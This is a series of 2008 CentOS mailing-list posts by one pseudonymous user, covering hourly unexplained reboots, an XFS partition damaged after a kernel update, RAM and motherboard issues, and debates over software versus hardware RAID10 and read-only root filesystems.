[CentOS] Strange reboots

2008-04-10 Thread Linux
Hi,

I have a CentOS 5.0 running as a web server.

# uname -a
Linux hostnamehidden.net 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:37:38
EST 2008 x86_64 x86_64 x86_64 GNU/Linux

Every 59 minutes (maybe every hour) it reboots without any logs,
without any traces and unfortunately with breaking software raid.
After reboot dmesg does not have any strange entries.

I double-checked crons, any strange services, nothing suspicious.

I did "yum update" recently.

I went to Datacenter and waited before the monitor but during reboot I
did not see anything strange. I guess reboot is cold reboot.

I changed all system and cpu fans. Upgraded system powersupply with a
more powerful one. Placed server infront of air-conditioner.

Do you have any idea?

Thanks.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Strange reboots

2008-04-10 Thread Linux
On Fri, Apr 11, 2008 at 1:44 AM, Benjamin Karhan <[EMAIL PROTECTED]> wrote:
>  ] Every 59 minutes (maybe every hour) it reboots without any logs,
>  ] without any traces and unfortunately with breaking software raid.
>  ] After reboot dmesg does not have any strange entries.
>  this really only helps you if you have X11 installed/enabled to begin with...

Well, X11 is not installed (just as would be expected from a production server)
Also I tried removing unneeded things ipv6 etc...
no luck yet...

And it is really annoying that I have only 59 minutes to work on it
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Strange reboots

2008-04-10 Thread Linux
On Fri, Apr 11, 2008 at 2:43 AM, William L. Maltby
<[EMAIL PROTECTED]> wrote:
>
> On Fri, 2008-04-11 at 02:02 +0300, Linux wrote:
>  > On Fri, Apr 11, 2008 at 1:44 AM, Benjamin Karhan <[EMAIL PROTECTED]> wrote:
>  > >  ] Every 59 minutes (maybe every hour) it reboots without any logs,
>  > >  ] without any traces and unfortunately with breaking software raid.
>  > >  ] After reboot dmesg does not have any strange entries.
>  > >  this really only helps you if you have X11 installed/enabled to begin 
> with...
>  >
>  > Well, X11 is not installed (just as would be expected from a production 
> server)
>  > Also I tried removing unneeded things ipv6 etc...
>  > no luck yet...
>  >
>  > And it is really annoying that I have only 59 minutes to work on it
>
>  I can't help, but if you post your hardware configuration, grub kernel
>  boot lines, OS status, etc., I bet there is someone that has your config
>  running that may have something useful to say. Maybe need something on
>  the kernel line like "lapic" or whatnot.

Note that, the reboot has no relation with earth time, just timer.
I feel like someone is making joke of me. Planted o timebomb
on my boot process and at 60th minute, it explodes.

hardware:
Intel(R) Core(TM)2 Quad CPUQ6600  @ 2.40GHz
8 GB RAM
4 x 300 GB SATA Disk (Soft RAID-1)
Intel Board (no idea about model/rev)

grub.conf line:
kernel /boot/vmlinuz-2.6.18-53.1.14.el5 ro root=/dev/md0 pci=nommconf mem=8318M

# uname -a
Linux hostnamehidden.net 2.6.18-53.1.14.el5 #1 SMP Wed Mar 5 11:37:38
EST 2008 x86_64 x86_64 x86_64 GNU/Linux

# ps ax
  PID TTY  STAT   TIME COMMAND
1 ?Ss 0:01 init [3]
2 ?S  0:00 [migration/0]
3 ?SN 0:00 [ksoftirqd/0]
4 ?S  0:00 [watchdog/0]
5 ?S  0:00 [migration/1]
6 ?SN 0:00 [ksoftirqd/1]
7 ?S  0:00 [watchdog/1]
8 ?S  0:00 [migration/2]
9 ?SN 0:00 [ksoftirqd/2]
   10 ?S  0:00 [watchdog/2]
   11 ?S  0:00 [migration/3]
   12 ?SN 0:00 [ksoftirqd/3]
   13 ?S  0:00 [watchdog/3]
   14 ?S< 0:00 [events/0]
   15 ?S< 0:00 [events/1]
   16 ?S< 0:00 [events/2]
   17 ?S< 0:00 [events/3]
   18 ?S< 0:00 [khelper]
   84 ?S< 0:00 [kthread]
   91 ?S< 0:00 [kblockd/0]
   92 ?S< 0:00 [kblockd/1]
   93 ?S< 0:00 [kblockd/2]
   94 ?S< 0:00 [kblockd/3]
   95 ?S< 0:00 [kacpid]
  190 ?S< 0:00 [cqueue/0]
  191 ?S< 0:00 [cqueue/1]
  192 ?S< 0:00 [cqueue/2]
  193 ?S< 0:00 [cqueue/3]
  196 ?S< 0:00 [khubd]
  198 ?S< 0:00 [kseriod]
  284 ?S  0:00 [pdflush]
  285 ?S  0:00 [pdflush]
  286 ?S< 0:00 [kswapd0]
  287 ?S< 0:00 [aio/0]
  288 ?S< 0:00 [aio/1]
  289 ?S< 0:00 [aio/2]
  290 ?S< 0:00 [aio/3]
  436 ?S< 0:00 [kpsmoused]
  493 ?S< 0:00 [ata/0]
  494 ?S< 0:00 [ata/1]
  495 ?S< 0:00 [ata/2]
  496 ?S< 0:00 [ata/3]
  497 ?S< 0:00 [ata_aux]
  503 ?S< 0:00 [scsi_eh_0]
  504 ?S< 0:00 [scsi_eh_1]
  505 ?S< 0:00 [scsi_eh_2]
  506 ?S< 0:00 [scsi_eh_3]
  507 ?S< 0:00 [scsi_eh_4]
  508 ?S< 0:00 [scsi_eh_5]
  511 ?S< 0:00 [md2_raid1]
  514 ?S< 0:00 [md1_raid1]
  517 ?S< 0:00 [md0_raid1]
  520 ?S< 0:00 [md3_raid1]
  521 ?S< 0:00 [kjournald]
  553 ?S< 0:00 [kauditd]
  587 ?S
 7331 ?S  0:00 /usr/sbin/exim -bd -q60m
 7333 ?S  0:00 /usr/sbin/exim -bd -q60m
 7334 ?S  0:00 /usr/sbin/exim -bd -q60m
 7341 ?S  0:00 crond
 7343 ?Ss 0:00 /bin/sh -c /usr/local/cpanel/bin/dcpumon
>/dev/null 2>&1
 7345 ?S  0:00 /usr/local/cpanel/bin/dcpumon
 7358 pts/0R+ 0:00 ps ax
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Strange reboots

2008-04-12 Thread Linux
On Fri, Apr 11, 2008 at 3:18 AM, Linux <[EMAIL PROTECTED]> wrote:
> On Fri, Apr 11, 2008 at 2:43 AM, William L. Maltby
>  <[EMAIL PROTECTED]> wrote:
>  >
>  > On Fri, 2008-04-11 at 02:02 +0300, Linux wrote:
>  >  > On Fri, Apr 11, 2008 at 1:44 AM, Benjamin Karhan <[EMAIL PROTECTED]> 
> wrote:
>  >  > >  ] Every 59 minutes (maybe every hour) it reboots without any logs,
>  >  > >  ] without any traces and unfortunately with breaking software raid.
>  >  > >  ] After reboot dmesg does not have any strange entries.
>  >  > >  this really only helps you if you have X11 installed/enabled to 
> begin with...

For the records...

Thanks for your responses and here is feedback:
- ssh root login is limited to certain ip's only...
- reboot is definitely a "cold reboot" but I am not a native english speaker :)
- power surge/temporary failure is not a case, datacenter has
expensive power equipment
- nor cpu heat is a case. I placed an extra thermometer and moved
server to the frond of cold air inlet.
- lmsensors or sensors does not exists.
- I tested with/out crons before. Pretty sure no relation with crons.
- External and internal services were expected to leave some marks.
Did a cronned "ps ax" and checked processes that run before restart,
nothing suspicious.

Consequently:
I had 4 DDR ECC RAM modules each 2 GB paired in 2 different brands.
Each brand functioned well as 4GB total but when all are installed
nightmare begins.
I guess (this time a real guess) I have a problem with my RAM
settings. 8 GB may cause this problem, may be a serious page fault
etc... Without grub parameter "mem=" server boots very slowly and also
responses very slowly.

Maybe I need a new thread title "Server too slow or too unstable with
8 GB RAM" :)

Thanks...
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] mdadm update

2008-05-12 Thread Linux
Hi,

I have uptodate x86_64 CentOS 5 with official repositories.
mdadm version is v2.5.4 - 13 October 2006

This version is known to have problems with raid10 configurations.
Sadly, I have a 4 disk raid10 on this system.

I tried adding Dag's repository but system complains about some
packages which are already installed as missing and refuses
to "# yum update"

This box also has some modifications so I do not want to change
repository settings.

I want to update mdadm.

Can I use standalone rpm file for this update?

Thanks.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] broken GFS

2008-05-12 Thread Linux
Well, I should add a terrible story for XFS...

I did a "yum update" and after updating many packages I rebooted and viola...
Old xfs module ruined my 1.2TB partition. After updating to correct module and
hours of xfs_repair I had to move and rename 500 subfolders from lost+found.

I am using CentOS because I have to (for cPanel).
I am not very comfortable with it (indeed I am a pro gentooer for 5-7 years)

On Mon, May 12, 2008 at 10:51 PM, Doug Tucker <[EMAIL PROTECTED]> wrote:
> This is the 2nd time this has happened to me.  There was a kernel
>  release over the weekend to .67.0.15, yet, they did not release the
>  updated GFS to go along with it, so when the machine rebooted, there was
>  no gfs file system in the new running kernel which in turn wreaked havoc
>  on my cluster.  I truly wish they would not do that :).  I guess I shall
>  have to not allow automatic yum updates from these machines.
>
>  ___
>  CentOS mailing list
>  CentOS@centos.org
>  http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] broken GFS

2008-05-12 Thread Linux
On Mon, May 12, 2008 at 11:48 PM, Tru Huynh <[EMAIL PROTECTED]> wrote:
> On Mon, May 12, 2008 at 11:00:18PM +0300, Linux wrote:
>  > Well, I should add a terrible story for XFS...
>  >
>  > I did a "yum update" and after updating many packages I rebooted and 
> viola...
>  You seem to enjoy living dangerously ? Don't you ever use a testing machine
>  before rolling the updates on a production server?
>  We appreciate your trust in our project, but you should always test on your
>  own setup.
Indeed that was my low-value testing machine. But I cannot afford a
third machine just for testing with the same hardware. Besides, if you
suggest a VM testing, it is not a real testing, not better than you
people do...

>  > Old xfs module ruined my 1.2TB partition. After updating to correct module 
> and
>  > hours of xfs_repair I had to move and rename 500 subfolders from 
> lost+found.
>  That is the 1st time I hear such a story: if the xfs module is not installed
>  for your new kernel, the only thing that should happen is the inability to
>  mount the XFS filesystem.
What a coincidence. That is the 1st time I live such a thing. Well,
show me a way to prove.

>  > I am using CentOS because I have to (for cPanel).
>  That's trolling, CPanel is NOT CentOS...
Neither I am a troll, nor do I know its meaning. And I do not have an
intention to blame CentOS for anything. I have to use CentOS because
it's the best of the choises CPanel requires. I am not keen on CentOS
way of eating yoghurt. [1]

This log is after update & reboot:
"May 11 16:06:03 x kernel: XFS: failed to read root inode"

And this is the last yum.log beginning from a month before:
---
Apr 02 23:40:03 Updated: krb5-libs.x86_64 1.6.1-17.el5_1.1
Apr 02 23:40:04 Updated: cups-libs.x86_64 1:1.2.4-11.14.el5_1.6
Apr 02 23:40:04 Updated: openldap.x86_64 2.3.27-8.el5_1.3
Apr 02 23:40:05 Updated: dbus.x86_64 1.0.0-6.3.el5_1
Apr 02 23:40:11 Updated: ghostscript.x86_64 8.15.2-9.1.el5_1.1
Apr 02 23:40:12 Updated: tk.x86_64 8.4.13-5.el5_1.1
Apr 02 23:40:13 Updated: kpartx.x86_64 0.4.7-12.el5_1.3
Apr 02 23:40:13 Updated: device-mapper-multipath.x86_64 0.4.7-12.el5_1.3
Apr 02 23:40:23 Updated: cups.x86_64 1:1.2.4-11.14.el5_1.6
Apr 02 23:40:23 Updated: autofs.x86_64 1:5.0.1-0.rc2.55.el5.3
Apr 02 23:40:23 Updated: krb5-libs.i386 1.6.1-17.el5_1.1
Apr 02 23:40:24 Updated: cups-libs.i386 1:1.2.4-11.14.el5_1.6
Apr 02 23:40:33 Updated: ghostscript.i386 8.15.2-9.1.el5_1.1
Apr 02 23:40:33 Updated: dbus.i386 1.0.0-6.3.el5_1
Apr 02 23:40:33 Updated: openldap.i386 2.3.27-8.el5_1.3
Apr 02 23:40:34 Updated: tk.i386 8.4.13-5.el5_1.1
Apr 02 23:41:13 Installed: kernel.x86_64 2.6.18-53.1.14.el5
Apr 02 23:41:23 Updated: tzdata.noarch 2007k-2.el5
Apr 02 23:41:24 Updated: krb5-devel.i386 1.6.1-17.el5_1.1
Apr 02 23:41:25 Updated: krb5-workstation.x86_64 1.6.1-17.el5_1.1
Apr 02 23:41:26 Updated: krb5-devel.x86_64 1.6.1-17.el5_1.1
Apr 02 23:41:30 Updated: kernel-headers.x86_64 2.6.18-53.1.14.el5
Apr 02 23:41:30 Installed: kmod-xfs.x86_64 0.4-1.2.6.18_53.1.14.el5
May 11 00:34:48 Updated: ImageMagick.x86_64 6.2.8.0-4.el5_1.1
May 11 00:34:52 Updated: ImageMagick.i386 6.2.8.0-4.el5_1.1
May 11 00:34:57 Updated: kernel-headers.x86_64 2.6.18-53.1.19.el5
May 11 00:35:04 Updated: squid.x86_64 7:2.6.STABLE6-5.el5_1.3
May 11 00:35:04 Updated: sos.noarch 1.7-9.2.el5
May 11 00:35:36 Installed: kernel.x86_64 2.6.18-53.1.19.el5
May 11 01:28:19 Installed: hddtemp.x86_64 0.3-0.14.beta15.el5.centos
May 11 01:40:35 Installed: apt.x86_64 0.5.15lorg3.2-1.el5.rf
May 11 17:13:03 Installed: kmod-xfs.x86_64 0.4-1.2.6.18_53.1.19.el5

According to this, there is a mystery in "May 11 16:06:03" because
there WAS a kmod_xfs but it was 53.1.14, not 53.1.19 as updated
kernel.

By the way, sorry for stealing some GFS thread but I see something
parallel in deep.

Thanks.

[1] There is a proverb like "Every knight has his own way of eating
yoghurt" which means you can eat yoghurt in different ways and also
envied people can eat it differently, which none of them is wrong. In
the end, yoghurt, a very useful nutrient, is eaten anyway.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] broken GFS

2008-05-12 Thread Linux
On Tue, May 13, 2008 at 1:15 AM, Tru Huynh <[EMAIL PROTECTED]> wrote:
> On Tue, May 13, 2008 at 12:40:22AM +0300, Linux wrote:
>  > What a coincidence. That is the 1st time I live such a thing. Well,
>  > show me a way to prove.
>  /var/log/messages ?
Only a small part of it.

>  > This log is after update & reboot:
>  > "May 11 16:06:03 x kernel: XFS: failed to read root inode"
>  nothing more?
Well, that is the only unexpected part. Just to show that XFS module
was loaded for WRONG kernel. As you said, you newer saw before.

>  > According to this, there is a mystery in "May 11 16:06:03" because
>  > there WAS a kmod_xfs but it was 53.1.14, not 53.1.19 as updated
>  > kernel.
>  too bad you rebooted 1 hour before the kernel-xfs module update.
When was kernel-xfs module updated in repository? Just that time? If
so too bad CentOS folks do not update every piece of kernel as a whole
in repositories. Where is integrity?

If not, "yum update" does not update everything at once. I have to run
yum update twice maybe more. First it will load kernel then see that a
new kernel is available, will go and bring its modules...

Still, it is a bit annoying and confusing. I am beginning to think
whether XFS is really supported in CentOS :)
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] broken GFS

2008-05-14 Thread Linux
On Wed, May 14, 2008 at 9:58 PM, Doug Tucker <[EMAIL PROTECTED]> wrote:

> This is a matter of agreeing to disagree on the release of a kernel and
> a supported file system.  If you had read my thread and subsequent
> paragraph you're taking issue with properly, you would have gotten that.
> My whole issue is around GFS, which is officially supported (someone
> else hijacked this thread with XFS which got more attention), and in my
> statement I said: "Keep in mind this is not an unsupported XFS that
> someone hijacked my thread with."  So I'm agreeing that XFS should never
> be brought up in the same fashion as GFS, as it is not a supported file
> system.  GFS is, and it is my opinion RH should release the 2 together.

Sorry pal, it's me who stole your thread with XFS. I feel obliged to
give an answer although which I do not have to but I'll.

I've been so far away from CentOS/RHEL that I even did not know the
difference between XFS and GFS which is officially supported by Redhat
guys. And CentOS' guys kindness about giving us a chance to use XFS is
really attracks my appreciation. Up to this was for my apology.

BUT (a big one);

People who prepare and maintain a distro have (and should have) many
concerns in mind. Security is one of them and integrity is another.
But in this situation, integrity is simply ignored (on the behalf of
GFS situation because I backed down from my XFS related complains)

Disabling kernel upgrades simply solves the situation but raises some
other questions about "What else can be broken with security
apprehensions?"

I do not know which one to choose:
- Absolutely not-working server because of missing updates
- Maybe will be attacked server because of missing security updates.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] broken GFS

2008-05-14 Thread Linux
On Wed, May 14, 2008 at 11:50 PM, John R Pierce <[EMAIL PROTECTED]> wrote:
> btw, what is WITH all these lame gmail addresses?   linuxlist ?   centoslist
> ??   Do I call you Mr Linux, or Mr List ?

Nothing to do with gmail. About calling me, it's a nice thing but
probably not needed. And I also know about usenet etiquette.

Well, I post in so many different threads and I do not want someone
googling and finding all about me. Besides, you people have the right
to ignore my-type people since not using real (or reallike nick)names.

Instead of deceiving people with different names on different
platforms, I prefer being honest about hiding my i.d. and I think this
is also my right (as your ignoring right)

But if it'll satisfy someone, I can choose some real-looking nicknames
from now on :)

Thanks...
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Best Motherboard

2008-05-15 Thread Linux
I guess your Gigabyte is a desktop one

Well, in production I used to use Intel server and workstation boards.
Not the best but more cooperative than most manifacturers with kernel
team I guess.

Currently I am testing some AMD stuff...

On Thu, May 15, 2008 at 2:43 PM, Ryan Nichols <[EMAIL PROTECTED]> wrote:
> To all..
>
> I was using a Gigabyte motherboard, and the board seems like a bad choice.
> What do you guys recommend for a decent server board that would use a Dual
> Core processor and DDR2 ram.  I dont want to replace the CPU and Mem i
> already have, just find a decent board that supportsthe existing..
>
> Thanks,
> Ryan Nichols
>
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] 1333/8GB Intel motherboard for C5.1

2008-05-20 Thread Linux
On Tue, May 20, 2008 at 8:13 PM, Nicholas <[EMAIL PROTECTED]> wrote:
> Typically Linux hackers can hack the kernel to use very large RAM. Current
> applications are built to access up to 4Gb RAM at a time only. For machines
> with RAM of more than 4Gb you need to verify that the CPU comes with
> Physical Address Extensions (PAE). Call Intel to verify this CPU is with
> PAE. So, now its the Linux kernel that you need to turn to.
>
> CentOS 5.1 64 bit should not have this limitation. However, the following
> method allows up to 64Gb out of box for CentOS 5.1 32bit (u can try this if
> the 64bit didnt work out).

You are missing the point about the bug in some Intel chipsets.
http://www.google.com/search?q=intel+chipset+kernel+4gb
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] 1333/8GB Intel motherboard for C5.1

2008-05-21 Thread Linux
On Wed, May 21, 2008 at 3:59 AM, Nicholas <[EMAIL PROTECTED]> wrote:
> Seems like it is the way Intel chips are designed. One solution would be to
> ensure that 64bit is used. However, due to cost I am sure many would have
> gone for the 32bit machines with AHCI mode.

Well, 64bit is the solution to address over-4GB memory. But since now,
whenever I decided to upgrade a intel chipset mobo over 4GB,
performance has significantly decreased. This is the BUG with latest
chipsets and bios; not 32bit/64bit addressing issue.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] RAID5 or RAID50 for database?

2008-05-22 Thread Linux
On Thu, May 22, 2008 at 7:12 PM, Guy Boisvert <[EMAIL PROTECTED]> wrote:
> You do not need two (2) raid controllers unless you want to have
> redundancy at the controller level.  Adaptec, 3Ware, etc do RAID 50.
> For RAID 50, you need at least 6 disks.
>
> http://en.wikipedia.org/wiki/RAID
>
>
> For database, i'd go with RAID 10.  As pointed out Joseph in a previous
> post, RAID 5 rebuilding would slows the array down.
>
> As for RAID 10, i didn't make extensive benchmarks but here are the
> rough results i got with Adaptec 3405 and four (4) Seagate 15K SAS drives:
>
>
> RAID 5: Read = 170 MiB/s
>Write =  135 MiB/s
>
> RAID 10: Read = 170 MiB/s
> Write = 160 MiB/s

And stick with md-raid 10 (also known as software raid) because it is
much more intelligently designed than any
closed-source-embedded-raid-controller.

Nowadays hardware raid frightens me because of the need to have spare
raid-controllers for every hardware-raid-configuration I have. They
are neither interchangable nor easily recoverable.

md-raid 10 can be established with any number of disks (at least 3 but
better check with google)
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] RAID5 or RAID50 for database?

2008-05-23 Thread Linux
On Fri, May 23, 2008 at 4:19 AM, Christopher Chan
<[EMAIL PROTECTED]> wrote:
>
>> And stick with md-raid 10 (also known as software raid) because it is
>> much more intelligently designed than any
>> closed-source-embedded-raid-controller.
>
> This was valid until...quite a few years ago.

Has hardware-raid vendors open-sourced their firmware then?

>> Nowadays hardware raid frightens me because of the need to have spare
>> raid-controllers for every hardware-raid-configuration I have. They
>> are neither interchangable nor easily recoverable.
>
> You seem to have been living under a rock for the last half decade.

For each hardware-raid configuration I keep a redundant
raid-controller. In case of controller failure it's the best way to
recover my data on disks. I tried simple test cases once (yes, on the
last half decade) and most failed except simple RAID-1 configurations.

>> md-raid 10 can be established with any number of disks (at least 3 but
>> better check with google)
>
> Hmm, I think your advice must be taken with a grain of salt. Have you
> actually tried to do what you suggest? In any case, I will give you the
> benefit of the doubt that you just did a typo.

mdadm raid10 is neither raid 1+0 nor raid 0+1. Go check with man mdadm
or google. Each stripe is written on 2 different disks with a rolling
frame and loss of 1 disk in 3 disk configuration can be recovered
online.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] RAID5 or RAID50 for database?

2008-05-23 Thread Linux
On Fri, May 23, 2008 at 8:28 AM, Guy Boisvert <[EMAIL PROTECTED]> wrote:
>> And stick with md-raid 10 (also known as software raid) because it is
>> much more intelligently designed than any
>> closed-source-embedded-raid-controller.
>
> "More intelligently designed" -> Could you please tell us more on this one?

Simple answer: Open Source (and for a long time) I guess you know what
it means. But I wander if source of Adaptec raid controller's firmware
is opened in recent years.

>> Nowadays hardware raid frightens me because of the need to have spare
>> raid-controllers for every hardware-raid-configuration I have. They
>> are neither interchangable nor easily recoverable.
>>
>> md-raid 10 can be established with any number of disks (at least 3 but
>> better check with google)
>
>
> Not easily recoverable?  I did recovery many time without a hitch (Adaptec,
> 3Ware, LSI, PERC)!

Try recovering 3Ware failed disks with Adaptec then. Nearly every
vendor has his own way in details. Yes, mostly documented but not
interchangable. And I do not mean only RAID-1.

> As for RAID 10 with 3 disks, mmm... go see:
>
> http://en.wikipedia.org/wiki/Redundant_array_of_independent_disks

mdadm Raid-10 is neither 1+0 nor 0+1. So 3 disks is enough to supply a
minimum level of redundancy. You should have 2 copies of each stripes
on either 2 of 3 disks. But in 3 disk configuration loss of 2 disk
means total loss. Go check with man mdadm.

> Lastly, it's kinda strange that your name is "Linux": Maybe you're young and
> your parents decided to honor this great OS!  Well, i may name my next
> children "Cento" !!! ;-)

Well, my parents taught me understanding what I read better than you
(although I'm not a native English speaker)

> Hey, have a nice day "Linuxito" !

Thanks buddy.

And for referance, try reading this [1]

I do not want to start a flame, just sharing my experience with
different hardwares. This comparison about software-hardware raid
excludes SAN and other external RAID solutions. Externally attached
storage is outside the scope of this discussion. Externally connected
solutions can obviously be SAN, software RAID, hardware RAID, or a
combination thereof. [1]

[1] http://linux.yyz.us/why-software-raid.html
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] RAID5 or RAID50 for database?

2008-05-24 Thread Linux
On Fri, May 23, 2008 at 5:31 PM, Guy Boisvert <[EMAIL PROTECTED]> wrote:
> Well, i respect Open Source (and your opinion) very much but your comparison
> imply that you had access to Adaptec's code!  Maybe you really had access, i
> don't know.  If it's the case, then thanks you for having shared this
> knowledge.

No need to see adaptec source code. Actively developed and widely used
open-source projects have great success over their closed-sourced
big-budgeted projects. But you are correct at one point: I do not have
right to blame any vendor without a fair comparison. However, none of
them tends to show theirs for a comparison. But again, according to
general inclination, I have a great feeling that I am right. Besides,
this is all about the philosophy of open-source. linux kernel-raid
still has my vote.

Nevertheless, closed-source firmwares are everywhere, should we become
paranoid? Maybe one day, but today, software linux kernel-raid is a
good competitor in raid world, so I think it is a good choice to be
paranoid about raid-stuff. (And of course we should, it is a cheap and
great redundancy and for both data safety and service continuety)

As an example, IBM's SAN devices are great I think. I'd used one and
loved its performance and simplicity and elasticity. No software
open-source solution can easily race with it.

> You're talking about failed disks or controller?
>
> With controller, easy with my backups (or backup card).  People with no
> tolerance to failing controller arrange things accordingly like i do.
>
> With disks, irrelevant.

This is what I'm trying to explain. Even the same vendor breaks
compatibility between different vendors and I'm still talking about
controller cards. I have to have backup cards for all configurations I
have. After using a backup card, I either have to supply a new backup
for controller card or have to transfer my configuration to a new
card.

For external solutions, I had only managed one configuration since now
so no comment/comparison on them.

> Well, educate me (and maybe others) M8.  I learn things everyday and i like
> it.  How would you do RAID10 with 3 disks?  I know how to do it with at
> least 4, then 6 and so on.
>
> As for RAID-10, more below.

Do not ask me, ask linux kernel raid10 developer [2]

> Well, english is neither my native language!  As for reading, i'm not that
> bad but i may have misunderstood what you really meant.  In that case,
> please forgive me!  I didn't meant to be rude or anything.

Please accept my apologies. I think I behaved somehow rude. No need to
talk about such non-technical issued in this kind of a list :)

> I agree that the compatibility is great with software RAID.  However, there
> are some limitations at least in performance (Bus saturation, etc).
>
> I "tried to read" your reference (the URL you kindly provided me, thanks)
> and, quote:
>
> "When the top array is a RAID 0 (such as in RAID 10 and RAID 50) most
> vendors omit the "+", though RAID 5+0 is clearer."
>
> "RAID 1+0: mirrored sets in a striped set (minimum four disks; even number
> of disks) provides fault tolerance and improved performance but increases
> complexity. The key difference from RAID 0+1 is that RAID 1+0 creates a
> striped set from a series of mirrored drives. In a failed disk situation
> RAID 1+0 performs better because all the remaining disks continue to be
> used. The array can sustain multiple drive losses so long as no mirror loses
> both its drives."
>
>
> So they say, and correct me if i'm wrong, that RAID10 is a RAID 1 of RAID 0.
>  A mirror of stripe sets.  You said it's not that, i lost you on this one.

linux kernel raid10 is a combination of both raid0 and raid1, not sum
of them. As developer himself says in [2] So you have 3x500GB disks
and 750GB raid-volume.

[2] http://neil.brown.name/blog/20040827225440

Have a nice sunday

P.S.: Once more, I am sorry to steal someone's thread which is about
raid5/raid50 but I am currently using raid10 in many configurations
and even after some disk failures I recovered easily. So, I can
honestly recommend raid10 over raid5(0) configurations.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] read only root file system

2008-05-25 Thread Linux
On Sat, May 24, 2008 at 8:29 PM, Fred Noz <[EMAIL PROTECTED]> wrote:
> In addition to easy maintenance, readonly-root adds a layer of security.
> The security is broken if someone gains access to the root user, but
> then many security protections are lost if someone gains root.

However, this should *never* be used alone for security concerns. A
compromiser can easily run that simple mount command to remount
read-write after root access. But sometimes before gaining root
access, some system spesific files are over-written to gain root
access with the help of exploits.. This helps keeping from them.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Hourly restart

2008-05-25 Thread Linux
Hi,

Without any update, hardware/software modification, etc... one of my
systems "Hourly restart" problem started again. Currently, I counted 5
restarts at 59th minute. No log entry, no console error, nothing
really interesting. If I do not see camera records with my own eyes,
I'll suspect about someone from D.C. hardreseting the box.

Now, I guess /var failed mounting and ssh not available. Maybe next
hour restart does a magic...

Last time, a kernel update solved hourly restart problem. Before
loosing access, I checked and saw a new kernel with -21 ending number
(x86_64, forgot to mention) and waiting for XFS module to be ready
(Well, I wish I had left it ext3) After that, perhaps update will
solve the problem again, but why?

Last time I stopped all crons, unneeded services, remote access, etc..
Put a man in front of the monitor and made him monitor everything.
Only thing he saw was a welcoming BIOS without any sign at the 60th
minute. Replaced power cords, power supply, some disks, RAM modules,
etc... Currently I have the last recovered remote logs of temperature
and voltage sensors of the system, all seems fine, nothing suspicious.

I am out of ideas. I have many gentoo boxes on the almost same
hardware and a few centos boxes. Only this one failes continuously...

I'd like to hear advice and suggestions about how to debug / repair
this situation.

Thanks.

P.S.: Complete hardware replacement plan is currently in action, new
hardware will be ready soon but I'm not so sure about hardware
failure. Why did it stopped last time after a simple kernel update?
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Hourly restart

2008-05-25 Thread Linux
On Mon, May 26, 2008 at 12:30 AM, Gregg McClintic <[EMAIL PROTECTED]> wrote:
> Anything in the bios called watchdog turned on?

Waiting for morning (it's late night here) for further diag.

Should I disable it? Or is it malfunctioning because of CentOS?

Thanks...
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] read only root file system

2008-05-25 Thread Linux
On Mon, May 26, 2008 at 2:15 AM, Karanbir Singh <[EMAIL PROTECTED]> wrote:
> I've been reading some of your recent comments, Anonymous looser, and
> I've really got to say this - you seem to make some authoritative style
> comments on things you really dont know much about. eg. in this case -
> the filesystem could be mounted readonly since its only exposed readonly
> from the underlying i/o or block subsystem.

Thank you for your comments. Next time I'll try to stop my ego... I
guess you are right. An authorative style would mean nothing without
an identity.

A cd-rom can provide security as a readonly mount, but readonly
mounted ordinary filesystem/disk means almost nothing. Dont you read
comments like "administrator remounts read-write"? Why?

I dont know, I like to be an a**hole looser I think.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] RAID5 or RAID50 for database?

2008-05-25 Thread Linux
On Mon, May 26, 2008 at 3:16 AM, Christopher Chan
<[EMAIL PROTECTED]> wrote:
> I believe you cannot do it via the installer yet. Can anybody confirm the
> presence of raid10 personality in Centos 5?

Installer does not have raid10 as an option. Not sure whether boot cd
has this module or not. But after installing, it exists.

Current mdadm raid10 version in CentOS5 is a little old (v2.5.4 - 13
October 2006) and has a bug which sometimes kicks one drive from raid
after initial resync and repeats kicking-after-resync when hot added
again and again and again.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] XFS install issue

2008-05-31 Thread Linux
On Sat, May 31, 2008 at 1:16 PM, Johnny Hughes <[EMAIL PROTECTED]> wrote:
> I also normally build all the extras kmods while I build the centosplus
> kernel, so they were also not yet done ... however I did go ahead and build

I dont intend to blame anybody but kmod_xfs was a couple of days late
for previous kernel update and I broke an xfs partition, as recorded
in list archives.

In that thread, I was told to expect such things and test better
because xfs was not in official brunch neither in rhel nor in centos.
